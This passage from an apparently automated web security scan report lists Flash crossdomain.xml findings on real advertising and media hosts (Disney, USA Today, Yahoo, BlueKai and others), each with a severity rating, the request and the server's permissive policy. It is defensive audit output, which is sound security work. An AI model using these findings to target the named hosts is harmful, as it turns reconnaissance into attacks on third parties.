<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.47. http://sync.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x5 pid 0x220a 8714
Set-Cookie: ts=1305509186; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:26:26 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.48. http://t.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 01:26:58 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.49. http://tags.bluekai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 01:26:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 07 Mar 2011 20:46:41 GMT
ETag: "c80001-ca-49dea97c4ae40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

6.50. http://ttwbs.channelintelligence.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ttwbs.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ttwbs.channelintelligence.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Date: Sun, 15 May 2011 20:26:57 GMT
Server: Jetty(6.1.22)
Content-Type: application/xml
Via: 1.0 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Content-Length: 441

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.51. http://turn.nexac.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://turn.nexac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: turn.nexac.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 16 May 2011 01:26:47 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 16 May 2011 01:26:46 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.52. http://usatoday1.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:26:53 GMT
Server: Omniture DC/2.0.0
xserver: www147
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

6.53. http://w88.go.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://w88.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: w88.go.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:27:17 GMT
Server: Omniture DC/2.0.0
xserver: www498
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.54. http://webtrends.telegraph.co.uk/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://webtrends.telegraph.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: webtrends.telegraph.co.uk

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:8fb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:19:37 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.55. http://www.viddler.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.viddler.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.viddler.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sun, 15 May 2011 20:26:39 GMT
Content-Type: application/xml
Connection: close
X-Viddler-Node: viddler_d
Accept-Ranges: bytes
ETag: W/"80-1303891997000"
Last-Modified: Wed, 27 Apr 2011 08:13:17 GMT
Content-Length: 80

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.56. http://adadvisor.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:31:36 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

6.57. http://api.tweetmeme.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 01:25:09 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Mon, 16 May 2011 01:25:25 +0000 GMT
Etag: 686d9b984ed45b19cd2ab4ba31d09141
X-Served-By: vanga

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

6.58. http://content.usatoday.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:45 GMT
Accept-Ranges: bytes
ETag: "2bdf8b1217e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:19:47 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.59. http://contextweb.usatoday.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://contextweb.usatoday.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: contextweb.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:45 GMT
ETag: "8034251217e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:19:45 GMT
Content-Length: 1558
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.60. http://cookex.amp.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cookex.amp.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cookex.amp.yahoo.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:24:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 14 May 2010 21:53:13 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

6.61. http://dcl.wdpromedia.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: dcl.wdpromedia.com

Response

HTTP/1.0 200 OK
Content-Length: 8308
Content-Type: text/xml
Last-Modified: Sat, 26 Feb 2011 00:32:21 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Expires: Mon, 16 May 2011 01:27:01 GMT
Cache-Control: max-age=300
Date: Mon, 16 May 2011 01:24:39 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="avmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="vmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.disney.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="espnwwos.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.disneyyouth.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="youthprograms.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyweddings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneymeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldmeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="jp.dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="advc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="disneycruise.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneycruise.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="disneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="disneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="destinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adestinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="radio.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneysmagicalbeginnings.com" />

<allow-access-from domain="*.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="park.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure2.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn2.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="ahongkongdisneyland.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secondthought.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.adtoolsinc.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.unionstudio.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cyberwocky.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.peelinteractive.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.northkingdom.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="bookwdw.reservations.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-sl.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="as1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="parksandresorts.wdpromedia.com" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="disneyworld2-qa2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disney.prizelogic.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.nthdegreefx.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.triggerla.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.triggersh.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.wdig.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="dlr1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dlr2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="m.disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-local.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-lt.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="qa-generic03.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyyouth-qa5.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.stage2.thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyinstitute.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa01.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa02.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-nap7.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...

6.62. http://dcl2.wdpromedia.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: dcl2.wdpromedia.com

Response

HTTP/1.0 200 OK
Content-Length: 8308
Content-Type: text/xml
Last-Modified: Sat, 26 Feb 2011 00:32:24 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Expires: Thu, 21 Apr 2011 01:15:30 GMT
Cache-Control: max-age=160
Date: Mon, 16 May 2011 01:23:40 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="avmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="vmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.disney.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="espnwwos.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.disneyyouth.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="youthprograms.disney.go.com" to-ports="*" />
...[SNIP]...
